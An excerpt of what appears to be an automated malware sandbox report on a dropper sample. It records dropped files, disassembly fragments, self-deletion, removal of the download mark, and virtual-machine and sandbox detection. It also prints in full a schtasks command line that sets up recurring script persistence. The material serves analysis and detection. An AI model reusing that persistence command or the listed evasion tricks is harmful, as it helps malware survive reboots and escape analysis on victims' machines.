Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401C23 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401C27 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00403235 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401BF2 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401BF3 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401BFE pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00403285 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_004010A9 push 1A43E3D0h; retf	0_2_004010B3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C8E pushad ; iretd	0_2_00841CC3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C8A pushad ; iretd	0_2_00841CC3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841110 push 1A43E3D0h; retf	0_2_0084111A
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C59 pushad ; iretd	0_2_00841CC3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C5A pushad ; iretd	0_2_00841CC3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C65 pushad ; iretd	0_2_00841CC3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C71 pushad ; iretd	0_2_00841CC3
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089EB9B push eax; ret	0_2_0089EBB2
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089D8A5 pushad ; iretd	0_2_0089D954
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089CECA push 1A43E3D0h; retf	0_2_0089CED4
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089D9D3 push edx; retn 0063h	0_2_0089D9DC
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089E60D push 0CEB7905h; retf	0_2_0089E612
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089EB63 push eax; ret	0_2_0089EBB2
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00403245 push eax; ret	3_2_00403276
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00403265 push eax; ret	3_2_00403276
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401C0A pushad ; iretd	3_2_00401C5C
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_0040321E push eax; ret	3_2_00403276
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401C23 pushad ; iretd	3_2_00401C5C
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401C27 pushad ; iretd	3_2_00401C5C

Source: h8jGj6Qe78.exe	Static PE information: section name: .text entropy: 7.663050428364978
Source: ewggbbh.1.dr	Static PE information: section name: .text entropy: 7.663050428364978

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	File created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\795933\Burn.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	File created: C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ewggbbh	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	File created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\329C.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	File created: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\DFA6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ewggbbh

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\h8jgj6qe78.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\ewggbbh:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00EA59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		25_2_00EA59B3
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E35EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		25_2_00E35EDA

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E433B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

25_2_00E433B7

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\329C.exe

Stalling execution: Execution stalls by calling Sleep

graph_7-1811

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\ewggbbh	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\ewggbbh	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ewggbbh, 00000003.00000002.1937922345.000000000083E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Memory allocated: 22D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Memory allocated: 2470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Memory allocated: 4470000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1407	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 757	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3233	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 873	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 878	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Window / User API: threadDelayed 4852	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Window / User API: threadDelayed 8445

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_25-99838

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_25-97769

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	API coverage: 0.3 %

Source: C:\Windows\explorer.exe TID: 7796	Thread sleep time: -140700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7792	Thread sleep time: -75700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8124	Thread sleep time: -34600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8120	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7796	Thread sleep time: -323300s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif TID: 5100	Thread sleep time: -48520s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe TID: 3588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe TID: 3300	Thread sleep count: 8445 > 30
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe TID: 3588	Thread sleep time: -37186s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif

Thread sleep count: Count: 4852 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\329C.exe	Code function: 7_2_004062EB FindFirstFileW,FindClose,	7_2_004062EB
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Code function: 7_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406CB1
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	25_2_00E84005
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	25_2_00E8C2FF
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8494A GetFileAttributesW,FindFirstFileW,FindClose,	25_2_00E8494A
